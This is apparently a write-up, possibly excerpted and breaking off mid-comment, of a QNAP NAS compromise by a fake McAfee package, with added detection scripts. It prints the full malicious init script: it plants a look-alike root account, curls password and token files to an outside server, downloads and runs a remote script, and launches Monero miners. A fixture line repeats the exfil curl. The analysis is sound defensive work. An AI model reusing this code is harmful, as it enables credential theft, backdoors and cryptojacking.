TL;DR - It's mining Monero (XMR), hidden under the guise of the McAfee app. Remove it (who wants McAfee anyways?), and change every password on the NAS, because the same package also uploads /etc/shadow and smbpasswd to its operator.
After a reboot, logging in over SSH and checking for active screen sessions revealed this:
[~] # screen -ls
There are screens on:
28017.MYMPNPSVR (Detached)
28014.MYMPNPSVR (Detached)
28011.MYMPNPSVR (Detached)
28008.MYMPNPSVR (Detached)
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
7 Sockets in /tmp/screens/S-admin.
The last 3 appear to be QNAP services (which are suspicious enough, but probably normal), but the first four are much more suspicious... Note that you can't see the content of these sessions (I should have taken a screenshot, but it's gone now), but they appeared to be XMRig (Monero mining), talking about H/s and receiving work and so on.
[~] # screen -x 28017
[screen is terminating]
[~] # screen -x 28014
[screen is terminating]
[~] # screen -x 28011
[screen is terminating]
[~] # screen -x 28008
[screen is terminating]
[~] # screen -ls
There are screens on:
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
3 Sockets in /tmp/screens/S-admin.
Killing them worked, but since they restart on boot, more investigation is necessary. Let's check the SysVinit scripts:
[~] # ls /etc/init.d/ -lrt
total 1880
-rwxr-xr-x 1 admin administrators 16640 2017-12-29 10:00 wireless.sh*
-rwxr-xr-x 1 admin administrators 22885 2017-12-29 10:00 wireless_modules.sh*
-rwxr-xr-x 1 admin administrators 1338 2017-12-29 10:00 wireless_detect.sh*
-rwxr-xr-x 1 admin administrators 2231 2017-12-29 10:00 winbind*
-rwxr-xr-x 1 admin administrators 4507 2017-12-29 10:00 wfm_thttpd.sh*
-rwxr-xr-x 1 admin administrators 847 2017-12-29 10:00 wait_RR*
-rwxr-xr-x 1 admin administrators 5197 2017-12-29 10:00 vlan.sh*
-rwxr-xr-x 1 admin administrators 12402 2017-12-29 10:00 usb_device_check.sh*
-rwxr-xr-x 1 admin administrators 1108 2017-12-29 10:00 urandom*
-rwxr-xr-x 1 admin administrators 3859 2017-12-29 10:00 upnpd.sh*
-rwxr-xr-x 1 admin administrators 20285 2017-12-29 10:00 update.sh*
-rwxr-xr-x 1 admin administrators 326 2017-12-29 10:00 update_power.sh*
-rwxr-xr-x 1 admin administrators 36406 2017-12-29 10:00 update_img.sh*
-rwxr-xr-x 1 admin administrators 1023 2017-12-29 10:00 update_def_share.sh*
-rwxr-xr-x 1 admin administrators 8686 2017-12-29 10:00 updatedb.sh*
-rwxr-xr-x 1 admin administrators 8035 2017-12-29 10:00 unit_test.sh*
-rwxr-xr-x 1 admin administrators 14048 2017-12-29 10:00 udev_run.sh*
-rwxr-xr-x 1 admin administrators 18622 2017-12-29 10:00 twonkymedia.sh*
-rwxr-xr-x 1 admin administrators 2455 2017-12-29 10:00 timemachine.sh*
-rwxr-xr-x 1 admin administrators 2932 2017-12-29 10:00 timechange_notify.sh*
-rwxr-xr-x 1 admin administrators 21088 2017-12-29 10:00 thttpd.sh*
-rwxr-xr-x 1 admin administrators 24022 2017-12-29 10:00 sysinit.sh*
-rwxr-xr-x 1 admin administrators 2653 2017-12-29 10:00 sync_action.sh*
-rwxr-xr-x 1 admin administrators 16032 2017-12-29 10:00 stunnel.sh*
-rwxr-xr-x 1 admin administrators 32429 2017-12-29 10:00 storage_usage.sh*
-rwxr-xr-x 1 admin administrators 81 2017-12-29 10:00 startup*
-rwxr-xr-x 1 admin administrators 1128 2017-12-29 10:00 start_service.sh*
-rwxr-xr-x 1 admin administrators 13162 2017-12-29 10:00 StartMediaService.sh*
-rwxr-xr-x 1 admin administrators 2752 2017-12-29 10:00 snmp*
-rwxr-xr-x 1 admin administrators 481 2017-12-29 10:00 snapshot.sh*
-rwxr-xr-x 1 admin administrators 142449 2017-12-29 10:00 smb.sh*
-rwxr-xr-x 1 admin administrators 8249 2017-12-29 10:00 smb2_protocol.sh*
-rwxr-xr-x 1 admin administrators 2122 2017-12-29 10:00 skylink-updater.sh*
-rwxr-xr-x 1 admin administrators 14652 2017-12-29 10:00 shutdown_check.sh*
-rwxr-xr-x 1 admin administrators 22649 2017-12-29 10:00 set_mtu.sh*
-rwxr-xr-x 1 admin administrators 15580 2017-12-29 10:00 set_led.sh*
-rwxr-xr-x 1 admin administrators 8365 2017-12-29 10:00 services.sh*
-rwxr-xr-x 1 admin administrators 2800 2017-12-29 10:00 selfhost-updater.sh*
-rwxr-xr-x 1 admin administrators 21189 2017-12-29 10:00 scan_wifi_ups.sh*
-rwxr-xr-x 1 admin administrators 5457 2017-12-29 10:00 s3_callback.sh*
-rwxr-xr-x 1 admin administrators 234 2017-12-29 10:00 runone.sh*
-rwxr-xr-x 1 admin administrators 3404 2017-12-29 10:00 rsyslog.sh*
-rwxr-xr-x 1 admin administrators 5629 2017-12-29 10:00 rsyncSpeedTest.sh*
-rwxr-xr-x 1 admin administrators 1963 2017-12-29 10:00 rsyncd.sh*
-rwxr-xr-x 1 admin administrators 1825 2017-12-29 10:00 reset_sata.sh*
-rwxr-xr-x 1 admin administrators 3640 2017-12-29 10:00 remote_folder_mount.sh*
-rwxr-xr-x 1 admin administrators 1169 2017-12-29 10:00 refresh_nvr_crontab.sh*
-rwxr-xr-x 1 admin administrators 966 2017-12-29 10:00 refresh_internet_status.sh*
-rwxr-xr-x 1 admin administrators 5751 2017-12-29 10:00 recycled.sh*
-rwxr-xr-x 1 admin administrators 535 2017-12-29 10:00 recoverd.sh*
-rwxr-xr-x 1 admin administrators 785 2017-12-29 10:00 reboot*
-rwxr-xr-x 1 admin administrators 461 2017-12-29 10:00 rcv_port.sh*
-rwxr-xr-x 1 admin administrators 7101 2017-12-29 10:00 rcS_normal*
-rwxr-xr-x 1 admin administrators 320 2017-12-29 10:00 rcS*
-rwxr-xr-x 1 admin administrators 5794 2017-12-29 10:00 rcK*
-rwxr-xr-x 1 admin administrators 4909 2017-12-29 10:00 radvd.sh*
-rwxr-xr-x 1 admin administrators 1520 2017-12-29 10:00 radius.sh*
-rwxr-xr-x 1 admin administrators 1315 2017-12-29 10:00 qts_notice.sh*
-rwxr-xr-x 1 admin administrators 62432 2017-12-29 10:00 Qthttpd.sh*
-rwxr-xr-x 1 admin administrators 1648 2017-12-29 10:00 qtag.sh*
-rwxr-xr-x 1 admin administrators 2941 2017-12-29 10:00 qsyncsrv_install.sh*
-rwxr-xr-x 1 admin administrators 4893 2017-12-29 10:00 qsyncman.sh*
-rwxr-xr-x 1 admin administrators 153 2017-12-29 10:00 qraid1.sh*
-rwxr-xr-x 1 admin administrators 550 2017-12-29 10:00 qplayd.sh*
-rwxr-xr-x 1 admin administrators 19176 2017-12-29 10:00 QMediaService.sh*
-rwxr-xr-x 1 admin administrators 2486 2017-12-29 10:00 qaccess.sh*
-rwxr-xr-x 1 admin administrators 610 2017-12-29 10:00 pw_sleep.sh*
-rwxr-xr-x 1 admin administrators 1197 2017-12-29 10:00 printer.sh*
-rwxr-xr-x 1 admin administrators 489 2017-12-29 10:00 poweroff*
-rwxr-xr-x 1 admin administrators 1665 2017-12-29 10:00 power_button.sh*
-rwxr-xr-x 1 admin administrators 54 2017-12-29 10:00 pd_detach*
-rwxr-xr-x 1 admin administrators 400 2017-12-29 10:00 pd_attach*
-rwxr-xr-x 1 admin administrators 2671 2017-12-29 10:00 oray-updater.sh*
-rwxr-xr-x 1 admin administrators 2841 2017-12-29 10:00 opentftp.sh*
-rwxr-xr-x 1 admin administrators 1219 2017-12-29 10:00 openssl_signature.sh*
-rwxr-xr-x 1 admin administrators 17588 2017-12-29 10:00 nvr_svc.sh*
-rwxr-xr-x 1 admin administrators 10749 2017-12-29 10:00 nvrd.sh*
-rwxr-xr-x 1 admin administrators 4383 2017-12-29 10:00 ntpf.sh*
-rwxr-xr-x 1 admin administrators 3992 2017-12-29 10:00 nsswitch.sh*
-rwxr-xr-x 1 admin administrators 69 2017-12-29 10:00 nss2_dusg.sh*
-rwxr-xr-x 1 admin administrators 496 2017-12-29 10:00 nsed.sh*
-rwxr-xr-x 1 admin administrators 2423 2017-12-29 10:00 noshareservices.sh*
-rwxr-xr-x 1 admin administrators 17985 2017-12-29 10:00 nfs*
-rwxr-xr-x 1 admin administrators 90813 2017-12-29 10:00 network.sh*
-rwxr-xr-x 1 admin administrators 8757 2017-12-29 10:00 mtp_run_hal.sh*
-rwxr-xr-x 1 admin administrators 12861 2017-12-29 10:00 mountall*
-rwxr-xr-x 1 admin administrators 436 2017-12-29 10:00 mkchangepwd.sh*
-rwxr-xr-x 1 admin administrators 975 2017-12-29 10:00 mariadb.sh*
-rwxr-xr-x 1 admin administrators 1086 2017-12-29 10:00 lunportman.sh*
-rwxr-xr-x 1 admin administrators 309 2017-12-29 10:00 log_rotation.sh*
-rwxr-xr-x 1 admin administrators 5968 2017-12-29 10:00 login.sh*
-rwxr-xr-x 1 admin administrators 3862 2017-12-29 10:00 load_lan_module.sh*
-rwxr-xr-x 1 admin administrators 1412 2017-12-29 10:00 ldap.sh*
-rwxr-xr-x 1 admin administrators 5319 2017-12-29 10:00 ldap_server.sh*
-rwxr-xr-x 1 admin administrators 3018 2017-12-29 10:00 ldap_backup_db.sh*
-rwxr-xr-x 1 admin administrators 5966 2017-12-29 10:00 lan_card_test.sh*
-rwxr-xr-x 1 admin administrators 1823 2017-12-29 10:00 klogd.sh*
-rwxr-xr-x 1 admin administrators 3349 2017-12-29 10:00 killnas.sh*
-rwxr-xr-x 1 admin administrators 1961 2017-12-29 10:00 kdebug.sh*
-rwxr-xr-x 1 admin administrators 3588 2017-12-29 10:00 iso_mount.sh*
-rwxr-xr-x 1 admin administrators 4020 2017-12-29 10:00 iscsiinit.sh*
-rwxr-xr-x 1 admin administrators 10123 2017-12-29 10:00 ipv6.sh*
-rwxr-xr-x 1 admin administrators 904 2017-12-29 10:00 ipmi_check*
-rwxr-xr-x 1 admin administrators 10219 2017-12-29 10:00 ipchange_notify.sh*
-rwxr-xr-x 1 admin administrators 30321 2017-12-29 10:00 installtgz.sh*
-rwxr-xr-x 1 admin administrators 7945 2017-12-29 10:00 init_qpkg.sh*
-rwxr-xr-x 1 admin administrators 251 2017-12-29 10:00 init_network.sh*
-rwxr-xr-x 1 admin administrators 26660 2017-12-29 10:00 init_nas.sh*
-rwxr-xr-x 1 admin administrators 9032 2017-12-29 10:00 init_mac_addr.sh*
-rwxr-xr-x 1 admin administrators 485 2017-12-29 10:00 init_lvm.sh*
-rwxr-xr-x 1 admin administrators 5555 2017-12-29 10:00 init_iTune.sh*
-rwxr-xr-x 1 admin administrators 14987 2017-12-29 10:00 init_hardware.sh*
-rwxr-xr-x 1 admin administrators 20193 2017-12-29 10:00 init_final.sh*
-rwxr-xr-x 1 admin administrators 1785 2017-12-29 10:00 init_dns_type.sh*
-rwxr-xr-x 1 admin administrators 25764 2017-12-29 10:00 init_disk.sh*
-rwxr-xr-x 1 admin administrators 46095 2017-12-29 10:00 init_check.sh*
-rwxr-xr-x 1 admin administrators 204 2017-12-29 10:00 init_acl.sh*
-rwxr-xr-x 1 admin administrators 1522 2017-12-29 10:00 idmap.sh*
-rwxr-xr-x 1 admin administrators 3955 2017-12-29 10:00 hostname.sh*
-rwxr-xr-x 1 admin administrators 1160 2017-12-29 10:00 getmac.sh*
-rwxr-xr-x 1 admin administrators 1552 2017-12-29 10:00 get_external_ip.sh*
-rwxr-xr-x 1 admin administrators 5236 2017-12-29 10:00 genLanglist.sh*
-rwxr-xr-x 1 admin administrators 1043 2017-12-29 10:00 gen_issue.sh*
-rwxr-xr-x 1 admin administrators 335 2017-12-29 10:00 gen_hd_info.sh*
-rwxr-xr-x 1 admin administrators 7003 2017-12-29 10:00 functions*
-rwxr-xr-x 1 admin administrators 668 2017-12-29 10:00 enc_share.sh*
-rwxr-xr-x 1 admin administrators 1655 2017-12-29 10:00 dhcpd.sh*
-rwxr-xr-x 1 admin administrators 1502 2017-12-29 10:00 dbus.sh*
-rwxr-xr-x 1 admin administrators 2168 2017-12-29 10:00 dav_mount.sh*
-rwxr-xr-x 1 admin administrators 3706 2017-12-29 10:00 cupsd.sh*
-rwxr-xr-x 1 admin administrators 4533 2017-12-29 10:00 crond.sh*
-rwxr-xr-x 1 admin administrators 14358 2017-12-29 10:00 create_udev_rule.sh*
-rwxr-xr-x 1 admin administrators 1351 2017-12-29 10:00 chkcfgpart.sh*
-rwxr-xr-x 1 admin administrators 3759 2017-12-29 10:00 check_service_noshare_run*
-rwxr-xr-x 1 admin administrators 603 2017-12-29 10:00 check_nss2*
-rwxr-xr-x 1 admin administrators 30 2017-12-29 10:00 _check_nss2*
-rwxr-xr-x 1 admin administrators 4881 2017-12-29 10:00 check_lan_port.sh*
-rwxr-xr-x 1 admin administrators 2743 2017-12-29 10:00 check_ddns_external_ip.sh*
-rwxr-xr-x 1 admin administrators 1514 2017-12-29 10:00 check_bootcmd.sh*
-rwxr-xr-x 1 admin administrators 7733 2017-12-29 10:00 cdrom.sh*
-rwxr-xr-x 1 admin administrators 496 2017-12-29 10:00 cacd.sh*
-rwxr-xr-x 1 admin administrators 78 2017-12-29 10:00 boot_done.sh*
-rwxr-xr-x 1 admin administrators 7113 2017-12-29 10:00 bluetooth.sh*
-rwxr-xr-x 1 admin administrators 2480 2017-12-29 10:00 backup_conf.sh*
-rwxr-xr-x 1 admin administrators 4247 2017-12-29 10:00 atalk.sh*
-rwxr-xr-x 1 admin administrators 45713 2017-12-29 10:00 antivirus.sh*
-rwxr-xr-x 1 admin administrators 703 2017-12-29 10:00 ads_register_dns.sh*
-rwxr-xr-x 1 admin administrators 1059 2017-12-29 10:00 adjust_sync_speed.sh*
-rwxr-xr-x 1 admin administrators 361 2017-12-29 10:00 addshare.sh*
-rwxr-xr-x 1 admin administrators 10749 2017-12-29 15:31 nvrd.sh_bak*
-rwxr-xr-x 1 admin administrators 17723 2017-12-29 16:00 tfan_auto_testing.sh*
-rwxr-xr-x 1 admin administrators 655 2017-12-29 16:00 qcloud_init.sh*
-rwxr-xr-x 1 admin administrators 1707 2017-12-29 16:00 qcloud_check*
-rwxr-xr-x 1 admin administrators 936 2017-12-29 16:00 qcloud_blob_daemon.sh*
-rwxr-xr-x 1 admin administrators 288 2017-12-29 16:00 qanalytic_init.sh*
-rwxr-xr-x 1 admin administrators 787 2017-12-29 16:00 push_notification_daemon.sh*
-rwxr-xr-x 1 admin administrators 2420 2017-12-29 16:00 porter.sh*
-rwxr-xr-x 1 admin administrators 547 2017-12-29 16:00 cloudinstall_report_complete_daemon.sh*
-rwxr-xr-x 1 admin administrators 765 2017-12-29 16:00 cloudinstall_init.sh*
-rwxr-xr-x 1 admin administrators 4470 2017-12-29 16:00 cloudinstall_init_daemon.sh*
-rwxr-xr-x 1 admin administrators 653 2017-12-29 16:00 cloudinstall_finish.sh*
-rw-r--r-- 1 admin administrators 9802 2017-12-29 16:01 genpowerfail.sh
-rwxr-xr-x 1 admin administrators 33479 2017-12-29 16:23 avahi.sh*
-rwxr-xr-x 1 admin administrators 1076 2017-12-29 16:29 reset_all.sh*
-rwxr-xr-x 1 admin administrators 1564 2017-12-29 16:29 photo_scand.sh*
-rwxr-xr-x 1 admin administrators 3463 2017-12-29 16:29 ntpd.sh*
-rwxr-xr-x 1 admin administrators 640 2017-12-29 16:29 ntpclient.sh*
-rwxr-xr-x 1 admin administrators 43292 2017-12-29 16:29 ImRd.sh*
-rwxr-xr-x 1 admin administrators 571 2017-12-29 16:29 sdmd.sh*
-rwxr-xr-x 1 admin administrators 701 2017-12-29 16:29 qbutton.sh*
-rwxr-xr-x 1 admin administrators 3069 2017-12-29 16:29 iscsitrgt.sh*
-rwxr-xr-x 1 admin administrators 52 2017-12-29 16:29 init_platform.sh*
-rwxr-xr-x 1 admin administrators 2130 2017-12-29 16:29 init_gpu.sh*
-rwxr-xr-x 1 admin administrators 1509 2017-12-29 16:29 fbdisk.sh*
-rwxr-xr-x 1 admin administrators 13280 2017-12-29 16:49 mysqld.sh*
-rwxr-xr-x 1 admin administrators 29407 2017-12-29 16:50 rsyncRR.sh*
-rwxr-xr-x 1 admin administrators 1528 2017-12-29 16:50 rsyncd_srv.sh*
-rwxr-xr-x 1 admin administrators 2390 2017-12-29 16:50 logo.sh*
-rwxr-xr-x 1 admin administrators 275 2017-12-29 16:50 install.sh*
-rwxr-xr-x 1 admin administrators 6272 2017-12-29 16:51 usb_ups.sh*
-rwxr-xr-x 1 admin administrators 1309 2017-12-29 16:51 snmp_ups.sh*
-rwxr-xr-x 1 admin administrators 3098 2017-12-29 16:51 ftp.sh*
-rwxr-xr-x 1 admin administrators 391 2017-12-29 16:51 ddns_update.sh*
-rwxr-xr-x 1 admin administrators 6455 2017-12-29 16:51 ddns_update_for_cgi.sh*
-rwxr-xr-x 1 admin administrators 1012 2017-12-29 16:51 ups.sh*
lrwxrwxrwx 1 admin administrators 8 2018-02-08 00:42 bonjour.sh -> avahi.sh*
lrwxrwxrwx 1 admin administrators 44 2018-02-08 00:42 mtp_run.sh -> /mnt/ext/opt/mtpBinary/etc/init.d/mtp_run.sh*
lrwxrwxrwx 1 admin administrators 72 2018-02-08 00:43 QNAP_Diagnostic_Tool.sh -> /share/CACHEDEV1_DATA/.qpkg/QNAP_Diagnostic_Tool/QNAP_Diagnostic_Tool.sh*
lrwxrwxrwx 1 admin administrators 53 2018-02-08 00:43 nvrec.sh -> /share/CACHEDEV1_DATA/.qpkg/StorageExpansion/nvrec.sh*
lrwxrwxrwx 1 admin administrators 44 2018-02-08 00:43 McAfee.sh -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee.sh*
lrwxrwxrwx 1 admin administrators 40 2018-02-08 00:43 qpkg_res.sh -> /mnt/ext/opt/ResourceMonitor/qpkg_res.sh*
lrwxrwxrwx 1 admin administrators 45 2018-02-08 00:44 helpdesk.sh -> /mnt/HDA_ROOT/update_pkg/helpdesk/helpdesk.sh*
lrwxrwxrwx 1 admin administrators 29 2018-02-08 00:44 qboost.sh -> /mnt/ext/opt/Qboost/qboost.sh*
lrwxrwxrwx 1 admin administrators 57 2018-02-08 00:44 QcloudSSLCertificate.sh -> /mnt/ext/opt/QcloudSSLCertificate/QcloudSSLCertificate.sh*
lrwxrwxrwx 1 admin administrators 51 2018-02-08 00:46 qsyncsrv.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/qsyncsrv.sh*
lrwxrwxrwx 1 admin administrators 53 2018-02-08 00:46 qsyncsrv_c.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/qsyncsrv_c.sh*
lrwxrwxrwx 1 admin administrators 51 2018-02-08 00:46 versiond.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/versiond.sh*
Nothing immediately jumps out, but what if we check the scripts for screen calls?
[~] # for f in /etc/init.d/*; do cat $f | grep screen; done
/screen/ALSADaemon &
/screen/animation &
/usr/sbin/screen -dmS QNAIRP /usr/bin/ntpd
/usr/sbin/screen -dmS QPLAYER /usr/bin/qsyncsman
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.b
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.bb
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.aa
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.n
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.nn
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.x
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.xx
/usr/sbin/screen -dmS LUNF /bin/sh /tmp/lun.sh
/sbin/daemon_mgr mytranscodesvr start "TERMINFO='/usr/share/terminfo/' LANG='en_US.UTF-8' /usr/sbin/screen -dmS 'MYTRANSCODE' $PACKAGE_PATH/bin/mytranscodesvr $TRANSCODE_PARAMS"
TERMINFO="/usr/share/terminfo/" LANG="en_US.UTF-8" /usr/sbin/screen -dmS 'QAIRP' /mnt/ext/opt/apache/bin/php /usr/local/medialibrary/bin/QAirplay/svc.php
There's something there! But where?
[~] # for f in /etc/init.d/*; do if $(cat $f | grep screen); then echo $f; fi; done
-sh: /screen/ALSADaemon: No such file or directory
/etc/init.d/McAfee.sh
[usage]: daemon_mgr [name] [action] [daemon]
[name]: name of daemon
[action]: "start" or "stop" or "nolog" or "ignore"
[daemon]: the execute file of daemon
[ex]: daemon_mgr thttpd start "/usr/local/sbin/thttpd -nor -nos -u root -l /var/log/thttpd.log -d /home/httpd -c '**.*' &"
/etc/init.d/QMediaService.sh
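Here is a version of that triage loop that only reports, as an added example (not a command from the original post). The post's loop wrote if $(cat $f | grep screen), which substitutes grep's output into the command line and executes it, so the matched screen line of each script was actually run. The functions below never execute anything they match, and they run here on two constructed sample scripts in a temporary directory (the IP in the sample is a documentation address, not the real one):

```sh
#!/bin/sh
# Added example, not code from the original post. Lists init scripts that
# launch something under screen or call out with curl/wget, without ever
# executing the matched text. Exercised on constructed sample files below.

# Lines in DIR/*.sh that invoke screen, curl or wget, printed as file:line:text.
# -H forces the file name even for a single file; -n gives the line number.
find_launchers() {
    grep -nH -E '(^|[ /])(screen|curl|wget)( |$)' "$1"/*.sh 2>/dev/null
}

# Number of distinct scripts in DIR that contain such a line (grep -l, no exec).
count_launcher_scripts() {
    grep -l -E '(^|[ /])(screen|curl|wget)( |$)' "$1"/*.sh 2>/dev/null | wc -l | tr -d ' '
}

# Constructed sample init scripts. 203.0.113.10 is a documentation address,
# standing in for the real upload host; $ipq stays literal (quoted heredoc).
make_samples() {
    d=$(mktemp -d)
    cat > "$d/McAfee.sh" <<'EOF'
#!/bin/sh
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/shadow" http://203.0.113.10:45865/x.php
EOF
    cat > "$d/ntpd.sh" <<'EOF'
#!/bin/sh
# a legitimate-looking script: a path containing the word is not a launcher
/screen/ALSADaemon &
/usr/sbin/ntpd -g
EOF
    echo "$d"
}

# Stand-alone run: print the hits in the sample directory, then clean up.
SAMPLES=$(make_samples)
find_launchers "$SAMPLES"
rm -rf "$SAMPLES"
```

On a real NAS, point find_launchers at /etc/init.d; it reports /etc/init.d/McAfee.sh with the line numbers of its screen and curl calls, and nothing is started in the process.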
Is McAfee the culprit? (The "No such file or directory" error and the daemon_mgr usage text above are side effects of that loop itself: if $(...) substitutes grep's output into the command line and runs it, so the first matched line of each script was executed, McAfee.sh's own screen -dmS QNAIRP line included. On a box you suspect is compromised, let grep report file names with -l rather than executing anything it finds.)
[~] # cat /etc/init.d/McAfee.sh
#!/bin/sh
CONF=/etc/config/qpkg.conf
QPKG_NAME="McAfee"
QPKG_ROOT=`/sbin/getcfg $QPKG_NAME Install_Path -f ${CONF}`
case "$1" in
start)
Lcheck=`/bin/grep аdmіn /etc/config/shadow`
if [ -n "$Lcheck" ]
then
echo "1"
else
echo "0"
echo 'аdmіn:$1$$L6f64ThMmMKGYXuq5BYmu.:14233:0:99999:7:::' >> /etc/shadow
echo 'аdmіn:x:0:0:administrator:/share/homes/admin:/bin/sh' >> /etc/passwd
fi
ipq=$(/sbin/curl http://ident.me)
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/shadow" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/smbpasswd" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/.qos_config/users/admin/.qtoken" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/uLinux.conf" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
chmod +x ${QPKG_ROOT}/McAfee
chmod +x ${QPKG_ROOT}/ntpd
chmod +x ${QPKG_ROOT}/qsyncsman
chmod +x ${QPKG_ROOT}/McAfeeDisk
/bin/ln -sf /etc/ /home/httpd/bfmfzyxqh7h38emut3kw
mkdir /etc/config/.qos_config/users/
mkdir /etc/config/.qos_config/users/admin
echo -e "1:1:qper098" > /etc/config/.qos_config/users/admin/.qtoken
[ -f /usr/bin/McAfee ] || /bin/ln -sf ${QPKG_ROOT}/McAfee /usr/bin/McAfee
[ -f /usr/bin/McAfeeDisk ] || /bin/ln -sf ${QPKG_ROOT}/McAfeeDisk /usr/bin/McAfeeDisk
[ -f /usr/bin/mscaner.a ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.a /usr/bin/mscaner.a
[ -f /usr/bin/mscaner.aa ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.aa /usr/bin/mscaner.aa
[ -f /usr/bin/mscaner.b ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.b /usr/bin/mscaner.b
[ -f /usr/bin/mscaner.bb ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.bb /usr/bin/mscaner.bb
[ -f /usr/bin/mscaner.n ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.n /usr/bin/mscaner.n
[ -f /usr/bin/mscaner.nn ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.nn /usr/bin/mscaner.nn
[ -f /usr/bin/mscaner.x ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.x /usr/bin/mscaner.x
[ -f /usr/bin/mscaner.xx ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.xx /usr/bin/mscaner.xx
[ -f /usr/bin/ntpd ] || /bin/ln -sf ${QPKG_ROOT}/ntpd /usr/bin/ntpd
[ -f /usr/bin/qsyncsman ] || /bin/ln -sf ${QPKG_ROOT}/qsyncsman /usr/bin/qsyncsman
/usr/bin/killall McAfee
/usr/bin/killall McAfeeDisk
/usr/bin/killall -9 ntpd
/usr/bin/killall -9 qsyncsman
/usr/sbin/screen -dmS QNAIRP /usr/bin/ntpd
/usr/sbin/screen -dmS QPLAYER /usr/bin/qsyncsman
check_aes=`/bin/grep aes /proc/cpuinfo`
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.b
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.bb
if [ -n "$check_aes" ]
then
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.aa
else
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.n
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.nn
fi
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.x
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.xx
MCcheck=`ps | grep "McAfee" | wc -l`
if (($MCcheck > 1))
then
echo "1"
chk=$(/bin/ps 2>&1)
curl --data "ip=$ipq" --data "$chk" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/fgdretres.php
else
chk=$(/usr/bin/McAfee -V 2>&1)
curl --data "ip=$ipq" --data "$chk" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/asyteruygjh.php
echo "0"
fi
/usr/bin/wget -O /tmp/lun.sh http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/fdsfds54.php
/usr/sbin/screen -dmS LUNF /bin/sh /tmp/lun.sh
rm /tmp/lun.sh
: ADD START ACTIONS HERE
;;
stop)
: ADD STOP ACTIONS HERE
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
esac
exit 0
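The start) branch above drops a UID 0 account spelled with look-alike letters, links /etc into the web root, writes a fixed .qtoken and starts screen sessions with fixed names. The checks below look for exactly those artefacts; they are an added example, not part of the original post. Each function takes the file or directory to inspect as an argument, so it runs here against constructed copies (the passwd lines and the screen -ls text are made up; the link name and token value are the ones in the script). On a NAS you would point them at /etc/passwd, /home/httpd, /etc/config and a saved screen -ls:

```sh
#!/bin/sh
# Added example, not from the original post: host checks for what McAfee.sh
# leaves behind. All checks take their input path as $1 and are exercised on
# constructed fixtures at the bottom.

# UID 0 accounts other than root and the QTS admin (admin is UID 0 on QTS, as
# the passwd line the script appends shows). The dropped account only looks
# like "admin": its name uses non-ASCII look-alike letters, so a byte-wise
# comparison catches what a glance at the file does not.
rogue_uid0() {
    awk -F: '$3 == 0 && $1 != "root" && $1 != "admin" { print $1 }' "$1"
}

# Account names containing any byte outside printable ASCII (homoglyphs).
# LC_ALL=C makes grep compare raw bytes, so multibyte letters fall in [^ -~].
nonascii_users() {
    cut -d: -f1 "$1" | LC_ALL=C grep '[^ -~]'
}

# Symlinks directly under the web root that resolve into /etc. The script does
# `ln -sf /etc/ /home/httpd/<random>`, exposing config files over HTTP.
webroot_links_to_etc() {
    find "$1" -maxdepth 1 -type l | while read -r l; do
        t=$(readlink "$l")
        case "$t" in /etc|/etc/*) echo "$l -> $t" ;; esac
    done
}

# The admin .qtoken holding the exact value the script writes. $1 is the
# config root (/etc/config on a NAS).
planted_qtoken() {
    [ "$(cat "$1/.qos_config/users/admin/.qtoken" 2>/dev/null)" = "1:1:qper098" ]
}

# Screen sessions using the names McAfee.sh assigns. QAIRP (without the N) is
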